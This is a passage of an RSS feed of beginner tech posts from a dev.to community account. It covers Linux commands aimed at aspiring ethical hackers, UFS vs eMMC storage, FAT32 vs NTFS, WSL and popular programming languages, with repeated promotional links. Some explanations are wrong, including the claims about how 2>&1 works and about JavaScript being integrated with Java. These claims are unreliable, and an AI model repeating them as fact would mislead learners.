&lt;p&gt;&lt;strong&gt;Hey Guys we just dropped our 1st video on YouTube .Please hit that subscribe button and make sure you smash that like button .Hotstar+Disney is a very famous streaming and entertainment service in India with more than 27 millon paid viewers and 300 millon monthly active users . We would love to hear your response .&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://www.youtube.com/watch?v=4pjpHUN28kk" rel="noopener noreferrer"&gt;https://www.youtube.com/watch?v=4pjpHUN28kk&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fvbprj0dselzoyybfclmn.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fvbprj0dselzoyybfclmn.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Be a part of us 🚀 🚀&lt;br&gt;
Telegram &lt;a href="https://t.me/forthecommunity" rel="noopener noreferrer"&gt;https://t.me/forthecommunity&lt;/a&gt;&lt;br&gt;
Discord &lt;a href="https://discord.com/invite/QsAqC4yKkm" rel="noopener noreferrer"&gt;https://discord.com/invite/QsAqC4yKkm&lt;/a&gt;&lt;br&gt;
Facebook &lt;a href="https://www.facebook.com/forcommunity.tech" rel="noopener noreferrer"&gt;https://www.facebook.com/forcommunity.tech&lt;/a&gt;&lt;br&gt;
Youtube &lt;a href="https://www.youtube.com/channel/UCP33irJmpa60rIuztDP2itQ" rel="noopener noreferrer"&gt;https://www.youtube.com/channel/UCP33irJmpa60rIuztDP2itQ&lt;/a&gt;&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Linux Basics for Beginners</title>
      <dc:creator>Kiran Sethumadhavan</dc:creator>
      <pubDate>Sat, 27 Feb 2021 11:55:59 +0000</pubDate>
      <link>https://dev.to/forcommunity/linux-basics-for-beginners-2n16</link>
      <guid>https://dev.to/forcommunity/linux-basics-for-beginners-2n16</guid>
      <description>&lt;p&gt;*&lt;em&gt;Do you want to become ethical hacker and want to know how hackers hack in Real World. Join the telegram group and be a&lt;br&gt;
part of us *&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Telegram&lt;/strong&gt;  = &lt;a href="https://t.me/infosecbugbounty" rel="noopener noreferrer"&gt;https://t.me/infosecbugbounty&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;More often than not, certain operating systems tend to get tied to certain tasks. When it comes to penetration testing, Linux based operating systems are always mapped to it. This article will help you get comfortable with the fundamentals of Linux. So let’s start.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why use Linux for pentesting ?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Linux offers a far higher level of control of the operating system, not to mention that it is open source. This also makes Linux transparent and easier to understand. Before we try to “hack” anything, it is a must to know how it works, this is why transparency in Linux is a huge plus.&lt;/p&gt;

&lt;p&gt;Because Linux is very popular amongst the pen-testing community, most of the used penetration testing tools and frameworks are also then built for Linux.&lt;/p&gt;

&lt;p&gt;Maintenance is also comparatively easy as the software can be easily installed up from its repository. It is also very stable when compared to traditional operating systems like Windows.&lt;/p&gt;

&lt;p&gt;Basic Linux Commands&lt;br&gt;&lt;br&gt;
Just like how we use Windows on a daily basis, creating folders, moving files, copying things, we’re going to learn these everyday operations for Linux.&lt;/p&gt;

&lt;p&gt;We’ll be spending most of our time in the terminal, which is the command-line interface of our operating system. This is where we type out commands to perform the operations we want.&lt;/p&gt;

&lt;p&gt;The &lt;strong&gt;“pwd”&lt;/strong&gt; Command&lt;br&gt;
Before we begin, we should know which directory we are working in, and where are the files we create going to be stored. The pwd command is one way to identify the directory we’re in.&lt;/p&gt;

&lt;p&gt;So as we did it in our case, we found that we’re in the /root directory.&lt;/p&gt;

&lt;p&gt;The*&lt;strong&gt;“whoami”&lt;/strong&gt;* Command&lt;br&gt;
Using the whoami command we see which user we’re logged in as. Here, we’re logged in as root (which translates to an administrator in the windows terms)&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;cd:&lt;/strong&gt; Changing directories&lt;br&gt;
To change directories via the terminal, we use the cd command. Let’s change our current directory to Desktop.&lt;/p&gt;

&lt;p&gt;cd Desktop/&lt;br&gt;
1&lt;br&gt;
cd Desktop/&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;ls:&lt;/strong&gt; Listing the Contents&lt;br&gt;
To see the contents of a directory we use the  “ls” command, (very similar to the dir command in windows)&lt;/p&gt;

&lt;p&gt;The “Help” Command&lt;br&gt;
Nearly every command, application and or utility in Linux has a dedicated help file which guides its usage. If you want to learn more regarding a specific command or if you’re stuck, help (-h, –help) will be your best friend.&lt;/p&gt;

&lt;p&gt;Let’s find out more about volatility framework.&lt;/p&gt;

&lt;p&gt;volatility --help&lt;br&gt;
1&lt;br&gt;
volatility --help&lt;/p&gt;

&lt;p&gt;man: The Manual Pages&lt;br&gt;
In addition to the help file, most commands and applications also have a manual page, which can be accessed via typing man before the command.&lt;/p&gt;

&lt;p&gt;As seen below, it provides a description and all the tags that can be used with the ls command.&lt;/p&gt;

&lt;p&gt;man ls&lt;br&gt;
1&lt;br&gt;
man ls&lt;/p&gt;

&lt;p&gt;locate: Searching keywords&lt;br&gt;
When searching for a specific keyword, one of the easiest ways to do so is using locate. Type locate and then the keyword on the terminal and it will search the entire file system for the occurrence of it.&lt;/p&gt;

&lt;p&gt;Though a few drawbacks of using locate as it provides too much information and the database it uses is updated once a day, so you can’t find files created minutes or hours ago.&lt;/p&gt;

&lt;p&gt;Let’s search for the keyword: CTF with&lt;/p&gt;

&lt;p&gt;locate CTF | more&lt;br&gt;
1&lt;br&gt;
locate CTF | more&lt;/p&gt;

&lt;p&gt;whereis: Finding binaries&lt;br&gt;
Let’s begin this section with what are binaries?&lt;/p&gt;

&lt;p&gt;Files that can be executed, similar to .exe’s in Windows are referred to as binaries. These files generally reside in the /usr/bin or /user/sbin directories.&lt;/p&gt;

&lt;p&gt;Utilities like ls, cd, cat, ps (we’ll cover some of these later in the article) are stored in these directories too.&lt;/p&gt;

&lt;p&gt;When looking for a binary file, we can use the whereis command. It returns the path of the binary as well it’s man page. Finding the binary file: git.&lt;/p&gt;

&lt;p&gt;whereis git&lt;br&gt;
1&lt;br&gt;
whereis git&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;which: Finding binaries&lt;/strong&gt;&lt;br&gt;
The which command is more specific and only return the location of the binary in the PATH variable in Linux. Finding the binary file: git.&lt;/p&gt;

&lt;p&gt;which git&lt;br&gt;
1&lt;br&gt;
which git&lt;/p&gt;

&lt;p&gt;Filtering with grep&lt;br&gt;
Very often when using the command line, you’ll want to search for a particular keyword, this is where grep comes in.&lt;/p&gt;

&lt;p&gt;Let’s search for the word: echo, in the simple_bash.sh file by typing&lt;/p&gt;

&lt;p&gt;grep -I "echo" simple_bash.sh&lt;br&gt;
1&lt;br&gt;
grep -I "echo" simple_bash.sh&lt;/p&gt;

&lt;p&gt;Thought the most common use case of grep it to pipe the output into it with the keywords to filter the output.&lt;/p&gt;

&lt;p&gt;Here we use grep just to get the IP address of our machine, instead of all the other information that comes when running the ifconfig command. (We’ll touch on the ifconfig common in the later section)&lt;/p&gt;

&lt;p&gt;ifconfig | grep inet&lt;br&gt;
1&lt;br&gt;
ifconfig | grep inet&lt;/p&gt;

&lt;p&gt;Searching with the “find” command&lt;br&gt;
The find command is the most powerful and flexible of the searching utilities. It is capable of different parameters, including, the filename (obviously), date of creation and or modification, the owner, the group, permission and the size.&lt;/p&gt;

&lt;p&gt;Here we use -type and -name tag which tells find the type of file we are looking for as well as its name. The backslash (/) indicates the root directory, which is where we want to search the file in.&lt;/p&gt;

&lt;p&gt;find / -type f -name hacking_articles&lt;br&gt;
1&lt;br&gt;
find / -type f -name hacking_articles&lt;/p&gt;

&lt;p&gt;If your result looks like this:&lt;/p&gt;

&lt;p&gt;It is because the find command is also searching through directories your account doesn’t have the permission to access to. Hence, for a cleaner result, we use 2&amp;gt;&amp;amp;1 which sends all the permission denied errors to /dev/null (into nothing) and then using grep filters them out of the output)&lt;/p&gt;

&lt;p&gt;find / -type f -name hacking_articles 2&amp;gt;&amp;amp;1 | grep -v "Permission Denied"&lt;br&gt;
1&lt;br&gt;
find / -type f -name hacking_articles 2&amp;gt;&amp;amp;1 | grep -v "Permission Denied"&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Hey Guys we just dropped our 1st video on YouTube.Please hit that subscribe button and make sure you smash that like button .Hotstar+Disney is a very famous streaming and entertainment service in India with more than 27 millon paid viewers and 300 millon monthly active users . We would love to hear your response .&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://www.youtube.com/watch?v=4pjpHUN28kk" rel="noopener noreferrer"&gt;https://www.youtube.com/watch?v=4pjpHUN28kk&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fvbprj0dselzoyybfclmn.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fvbprj0dselzoyybfclmn.png" alt="Alt Text" width="800" height="450"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Be a part of us 🚀 🚀&lt;br&gt;
Telegram &lt;a href="https://t.me/forthecommunity" rel="noopener noreferrer"&gt;https://t.me/forthecommunity&lt;/a&gt;&lt;br&gt;
Discord &lt;a href="https://discord.com/invite/QsAqC4yKkm" rel="noopener noreferrer"&gt;https://discord.com/invite/QsAqC4yKkm&lt;/a&gt;&lt;br&gt;
Facebook &lt;a href="https://www.facebook.com/forcommunity.tech" rel="noopener noreferrer"&gt;https://www.facebook.com/forcommunity.tech&lt;/a&gt;&lt;br&gt;
Youtube &lt;a href="https://www.youtube.com/channel/UCP33irJmpa60rIuztDP2itQ" rel="noopener noreferrer"&gt;https://www.youtube.com/channel/UCP33irJmpa60rIuztDP2itQ&lt;/a&gt;&lt;/p&gt;

</description>
      <category>programming</category>
      <category>productivity</category>
      <category>devops</category>
      <category>devjournal</category>
    </item>
    <item>
      <title>What is UFS 3.0? How is UFS better than eMMC 5.1?</title>
      <dc:creator>Kiran Sethumadhavan</dc:creator>
      <pubDate>Mon, 01 Feb 2021 11:21:45 +0000</pubDate>
      <link>https://dev.to/forcommunity/what-is-ufs-3-0-how-is-ufs-better-than-emmc-5-1-2e0l</link>
      <guid>https://dev.to/forcommunity/what-is-ufs-3-0-how-is-ufs-better-than-emmc-5-1-2e0l</guid>
      <description>&lt;p&gt;What is UFS 3.0? &lt;/p&gt;

&lt;p&gt;Typically, smartphones and tablets have used older and cheaper eMMCs storage to store information. However, starting with the Samsung Galaxy S6, we have been seeing Universal Flash Storage (UFS) on flagship smartphones.&lt;/p&gt;

&lt;p&gt;UFS 3.0 basically incorporates support for the latest high-density NAND memories and supports the latest and smarter interconnects between your phone’s chipset and memory for faster and more reliable communication between the two.&lt;/p&gt;

&lt;p&gt;Overall, UFS (Universal Flash Storage )3.0 storage could almost double data bandwidth while consuming lesser power. These storages can also withstand higher temperature range (-40°C to 105°C) which makes them more suitable for automotive applications.&lt;/p&gt;

&lt;p&gt;Another important UFS (Universal Flash Storage)3.0 feature is support for multiple RPMBs (replay protected memory block) with multiple RPMB keys. RPMBs are hardware partitions used for securely storing critical data like user billing information, DRM(Digital rights management ) content protection keys, etc. RPMB regions are fixed at manufacturing and are also configurable at manufacturing.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How is UFS better than eMMC 5.1?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;eMMC, or embedded multimedia card, is a go-to memory solution for many consumer electronics, including tablets, smartphones, GPS systems, eReaders, and other mobile computing devices. Then, UFC came into the scene which is an advanced solution in comparison to eMMC. It has faster sequential read speed, sequential write speed, random read speed, and random write speed.&lt;/p&gt;

&lt;p&gt;UFS touts a considerable improvement in performance due to the following reasons:&lt;/p&gt;

&lt;p&gt;UFS can read and write simultaneously&lt;br&gt;
Multiple commands can be addressed at the same time and the order of tasks can be changed accordingly.&lt;br&gt;
UFS 3.0 vs. UFS 2.1 Speed Difference&lt;/p&gt;

&lt;p&gt;Theoretically, it would propel a 2X increase in speed as it’s designed for twice the bandwidth of the current UFS 2.1 standard. This facilitates a transfer speed up to 11.6 Gbps per lanes and since there are two channels, a hyper-speed of 23.2 Gbps can be reached. But practically speaking, we could expect a speed of around 15 Gbps (1.875 GB/s).&lt;/p&gt;

&lt;p&gt;Moreover, these communication channels between the chipset and storage will be relatively better trained to handle consistent application workload because of the additional QoS (Quality of Service) feature.&lt;/p&gt;

&lt;p&gt;It is optimized for significant reductions in device power consumption and this will make flash storage more reliable at a greater range of temperatures. So, now you can capture a 4K and even 8K video without troubling the handset too much.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F8mybyghz1tupn85ce60v.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F8mybyghz1tupn85ce60v.png" alt="Alt Text" width="800" height="450"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Hey Guys we just dropped our 1st video on YouTube at 10 Am (IST) on 16 January 2020 .Please hit that subscribe button and make sure you smash that like button .Hotstar+Disney is a very famous streaming and entertainment service in India with more than 27 millon paid viewers and 300 millon monthly active users . We would love to hear your response .&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://www.youtube.com/watch?v=4pjpHUN28kk" rel="noopener noreferrer"&gt;https://www.youtube.com/watch?v=4pjpHUN28kk&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Be a part of us 🚀 🚀&lt;br&gt;
Telegram &lt;a href="https://t.me/forthecommunity" rel="noopener noreferrer"&gt;https://t.me/forthecommunity&lt;/a&gt;&lt;br&gt;
Discord &lt;a href="https://discord.com/invite/QsAqC4yKkm" rel="noopener noreferrer"&gt;https://discord.com/invite/QsAqC4yKkm&lt;/a&gt;&lt;br&gt;
Facebook &lt;a href="https://www.facebook.com/forcommunity.tech" rel="noopener noreferrer"&gt;https://www.facebook.com/forcommunity.tech&lt;/a&gt;&lt;br&gt;
Youtube &lt;a href="https://www.youtube.com/channel/UCP33irJmpa60rIuztDP2itQ" rel="noopener noreferrer"&gt;https://www.youtube.com/channel/UCP33irJmpa60rIuztDP2itQ&lt;/a&gt;&lt;/p&gt;

</description>
      <category>devops</category>
      <category>programming</category>
      <category>techtalks</category>
      <category>devjournal</category>
    </item>
    <item>
      <title>FAT32 vs. NTFS: Which Is Better?🔥🔥</title>
      <dc:creator>Kiran Sethumadhavan</dc:creator>
      <pubDate>Wed, 27 Jan 2021 12:23:28 +0000</pubDate>
      <link>https://dev.to/forcommunity/fat32-vs-ntfs-which-is-better-5g10</link>
      <guid>https://dev.to/forcommunity/fat32-vs-ntfs-which-is-better-5g10</guid>
      <description>&lt;p&gt;Windows-supported operating systems rely on one of two different types of file systems: File Allocation Table (FAT) or New Technology File System (NTFS).&lt;/p&gt;

&lt;p&gt;While both file systems were created by Microsoft, each has different benefits and disadvantages related to compatibility, security, and flexibility.&lt;/p&gt;

&lt;p&gt;In this article, we will break down what a FAT file system is, what an NTFS file system is and what the pros and cons are for each system.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What Is FAT?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Microsoft created the File Allocation Table file system in 1977 and is the simplest file system supported by Windows NT. It is the older of the two file systems and therefore isn’t as efficient or advanced. However, it does offer more compatibility with other operating systems and removable storage devices.&lt;/p&gt;

&lt;p&gt;The FAT is used to describe the allocation status of the clusters (the basic units of logical storage on a hard drive) in a file system, as well as the link relationship between each. It acts as a Table of Contents for the operating system, indicating where directories and files are stored on the disk.&lt;/p&gt;

&lt;p&gt;A FAT is often most used in removable storage devices, such as digital cameras, Smart TVs and other portable devices.&lt;/p&gt;

&lt;p&gt;The file allocation table is a critical part of the FAT file system. If the FAT is damaged or lost, the data on the hard disk becomes unreadable.&lt;/p&gt;

&lt;p&gt;There are several limitations to using a FAT32 file system:&lt;/p&gt;

&lt;p&gt;FAT32 only supports files of up to 4GB in size and volumes of up to 2TB in size&lt;/p&gt;

&lt;p&gt;FAT32 isn’t a journaling file system, which means corruption can happen more easily&lt;/p&gt;

&lt;p&gt;FAT32 doesn’t support file permissions&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What Is NTFS?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Microsoft created the New Technology File System in 1993, and it is now the most widely used file system in Windows.&lt;/p&gt;

&lt;p&gt;It was introduced as a replacement for the FAT file system, designed to improve upon FAT by increasing performance, reliability and disk space.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;NTFS supports:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Very large files&lt;/p&gt;

&lt;p&gt;Different file permissions and encryption&lt;/p&gt;

&lt;p&gt;Automatically restores consistency by using log file and checkpoint information&lt;/p&gt;

&lt;p&gt;File compression when running out of disk space&lt;/p&gt;

&lt;p&gt;Establishing disk quotas, LIMITING space users can use&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;FAT vs. NTFS&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;FAT is the more simple file system of the two, but NTFS offers different enhancements and offers increased security. Choosing the right operating system depends on your needs.&lt;/p&gt;

&lt;p&gt;Fault Tolerance: NTFS automatically repairs files/folders in the case of power failures or errors. FAT32 maintains two different copies of the FAT in the case of damage.&lt;/p&gt;

&lt;p&gt;Security: FAT32 only offers shared permissions, while NTFS allows you to set specific permissions to local files/folders.&lt;/p&gt;

&lt;p&gt;Compression: FAT32 does not offer any compression option. NTFS does allow for individual compression of files and folders so you don’t slow down the system.&lt;/p&gt;

&lt;p&gt;Compatibility: NTFS is compatible with operating systems back to Windows XP. For Mac OS users, however, NTFS systems can only be read by Mac, while FAT32 drives can be both read and written to by the Mac OS.&lt;/p&gt;

&lt;p&gt;The biggest disadvantage of using the NTFS file system is compatibility:&lt;/p&gt;

&lt;p&gt;Many removable devices, such as Android smartphones don’t support NTFS&lt;/p&gt;

&lt;p&gt;While Mac OS X can read support for NTFS drives, but it can’t write to NTFS drives without third-party software&lt;/p&gt;

&lt;p&gt;Some media devices, including Smart TVs, media players, and printers, don’t support NTFS&lt;/p&gt;

&lt;p&gt;NTFS file systems are only compatible with Windows 2000 and later versions of Windows&lt;/p&gt;

&lt;p&gt;When it comes to removable devices, it’s safer to use FAT32 so they can be used with almost any device.&lt;/p&gt;

&lt;p&gt;There is no clear winner when it comes to FAT vs. NTFS. Choosing the right file system depends on your individual needs and uses.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Hey Guys we just dropped our 1st video on YouTube at 10 Am (IST) on 16 January 2020 .Please hit that subscribe button and make sure you smash that like button .Hotstar+Disney is a very famous streaming and entertainment service in India with more than 27 millon paid viewers and 300 millon monthly active users . We would love to hear your response .&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://www.youtube.com/watch?v=4pjpHUN28kk" rel="noopener noreferrer"&gt;https://www.youtube.com/watch?v=4pjpHUN28kk&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fvbprj0dselzoyybfclmn.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fvbprj0dselzoyybfclmn.png" alt="Alt Text" width="800" height="450"&gt;&lt;/a&gt;&lt;br&gt;
Be a part of us 🚀 🚀&lt;br&gt;
Telegram &lt;a href="https://t.me/forthecommunity" rel="noopener noreferrer"&gt;https://t.me/forthecommunity&lt;/a&gt;&lt;br&gt;
Discord &lt;a href="https://discord.com/invite/QsAqC4yKkm" rel="noopener noreferrer"&gt;https://discord.com/invite/QsAqC4yKkm&lt;/a&gt;&lt;br&gt;
Facebook &lt;a href="https://www.facebook.com/forcommunity.tech" rel="noopener noreferrer"&gt;https://www.facebook.com/forcommunity.tech&lt;/a&gt;&lt;br&gt;
Youtube &lt;a href="https://www.youtube.com/channel/UCP33irJmpa60rIuztDP2itQ" rel="noopener noreferrer"&gt;https://www.youtube.com/channel/UCP33irJmpa60rIuztDP2itQ&lt;/a&gt;&lt;/p&gt;

</description>
      <category>devops</category>
      <category>programming</category>
      <category>productivity</category>
      <category>ubuntu</category>
    </item>
    <item>
      <title>What is WSL ? What are the Features of WSL ?</title>
      <dc:creator>Justin Varghese</dc:creator>
      <pubDate>Tue, 19 Jan 2021 11:51:45 +0000</pubDate>
      <link>https://dev.to/forcommunity/what-is-wsl-what-are-the-features-of-wsl-35c</link>
      <guid>https://dev.to/forcommunity/what-is-wsl-what-are-the-features-of-wsl-35c</guid>
      <description>&lt;p&gt;WSL also known as windows Subsystem for linux .The Windows Subsystem for Linux lets developers run a GNU/Linux environment -- including most command-line tools, utilities, and applications -- directly on Windows, unmodified, without the overhead of a traditional virtual machine or dual boot setup. Which helps users to save a plenty of time by not running into an error .Even after so many efforts put by Microsoft, Users  love to use Linux over Windows .&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Features of WSL&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;You can Run common command-line tools such as grep, sed, awk, or other ELF-64 binaries.&lt;br&gt;
Run Bash shell scripts and GNU/Linux command-line applications including:&lt;br&gt;
Tools: vim, emacs, tmux&lt;br&gt;
Languages: NodeJS, Javascript, Python, Ruby, C/C++, C# &amp;amp; F#, Rust, Go, etc.&lt;br&gt;
Services: SSHD, MySQL, Apache, lighttpd, MongoDB, PostgreSQL.&lt;br&gt;
Install additional software using your own GNU/Linux distribution package manager.&lt;br&gt;
Invoke Windows applications using a Unix-like command-line shell.&lt;br&gt;
Invoke GNU/Linux applications on Windows.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Please also subscribe our YouTube Channel&lt;br&gt;
Hostar+Disney Clone made for Beginners using Reacts js&lt;/strong&gt; &lt;br&gt;
&lt;a href="https://www.youtube.com/watch?v=4pjpHUN28kk&amp;amp;fbclid=IwAR02hJnCgk5qXDVdHPsCxqZgm8dY2kWXbGdRuFwtaHLBuV0TQiLQvJzw1t0&amp;amp;ab_channel=ForCommunity"&gt;https://www.youtube.com/watch?v=4pjpHUN28kk&amp;amp;fbclid=IwAR02hJnCgk5qXDVdHPsCxqZgm8dY2kWXbGdRuFwtaHLBuV0TQiLQvJzw1t0&amp;amp;ab_channel=ForCommunity&lt;/a&gt;&lt;/p&gt;

</description>
      <category>devops</category>
      <category>linux</category>
      <category>programming</category>
      <category>discuss</category>
    </item>
    <item>
      <title>Hotstar+Disney Clone for Beginners made using React Js</title>
      <dc:creator>Kiran Sethumadhavan</dc:creator>
      <pubDate>Fri, 15 Jan 2021 05:41:31 +0000</pubDate>
      <link>https://dev.to/forcommunity/hotstar-disney-clone-for-beginners-made-using-react-js-21l4</link>
      <guid>https://dev.to/forcommunity/hotstar-disney-clone-for-beginners-made-using-react-js-21l4</guid>
      <description>&lt;p&gt;Hey Guys we are dropping our 1st video on YouTube at 10 Am (IST) on 16 January 2020 .Please hit that subscribe button and make sure you smash that like button .Hotstar+Disney is a very famous streaming and entertainment service in India with more than 27 millon paid viewers and 300 millon monthly active users . We would love to hear your response .&lt;/p&gt;

&lt;p&gt;&lt;a href="https://www.youtube.com/watch?v=4pjpHUN28kk" rel="noopener noreferrer"&gt;https://www.youtube.com/watch?v=4pjpHUN28kk&lt;/a&gt;&lt;/p&gt;

</description>
      <category>devops</category>
      <category>programming</category>
      <category>devjournal</category>
      <category>productivity</category>
    </item>
    <item>
      <title>Best Programming languages in 2021</title>
      <dc:creator>Kiran Sethumadhavan</dc:creator>
      <pubDate>Thu, 14 Jan 2021 07:42:37 +0000</pubDate>
      <link>https://dev.to/forcommunity/best-programming-language-in-2021-3d6i</link>
      <guid>https://dev.to/forcommunity/best-programming-language-in-2021-3d6i</guid>
      <description>&lt;p&gt;1 Javascript &lt;/p&gt;

&lt;p&gt;JavaScript is a lightweight, interpreted programming language. It is designed for creating network-centric applications. It is complimentary to and integrated with Java. JavaScript is very easy to implement because it is integrated with HTML. It is open and cross-platform.Many famous sites like Google ,Youtube and Facebook are built on Javascript .&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fn02rxrkwt9g1tl2gqua9.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fn02rxrkwt9g1tl2gqua9.jpg" alt="Alt Text" width="800" height="450"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;2.Python&lt;/p&gt;

&lt;p&gt;Python is an interpreted, high-level and general-purpose programming language. Python's is the most loved language among the developers as it is very simple to learn and used in web Development to Data science &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F4htn2m6rgxxovz5qd48l.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F4htn2m6rgxxovz5qd48l.png" alt="Alt Text" width="800" height="347"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;3.GO&lt;/p&gt;

&lt;p&gt;It is very much designed with server-side development in mind. Channels, go routines, non-blocking IO built-in—all point to the preference for creating highly concurrent servers. I would say that here it is mostly in the same area as Erlang. In reality most Go projects are either web applications, pure socket servers (games, streaming media, proxies, load balance rs, &amp;amp;c.) or clients connecting to multiple servers (like web crawlers).&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fs3ae7v6okd95ga4gpb3s.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fs3ae7v6okd95ga4gpb3s.png" alt="Alt Text" width="800" height="451"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;4.Swift &lt;/p&gt;

&lt;p&gt;Swift is a powerful and intuitive programming language for macOS, iOS, watchOS, tvOS and beyond. Writing Swift code is interactive and fun, the syntax is concise yet expressive, and Swift includes modern features developers love. Swift code is safe by design, yet also produces software that runs lightning-fast.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fbmswl2kdkeg78kg5ekyz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fbmswl2kdkeg78kg5ekyz.png" alt="Alt Text" width="800" height="407"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;5.Ruby&lt;/p&gt;

&lt;p&gt;Ruby is an interpreted, high-level, general-purpose programming language.There's more than one way to do the same thing . It is a dynamic, reflective, object-oriented.&lt;br&gt;
Companies that use Ruby: Hulu, Twitter, ZenDesk, Basecamp, Shopify, Urban Dictionary, GitHub&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fcrol0b8uvcyhpazisr7o.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fcrol0b8uvcyhpazisr7o.png" alt="Alt Text" width="800" height="616"&gt;&lt;/a&gt;&lt;/p&gt;

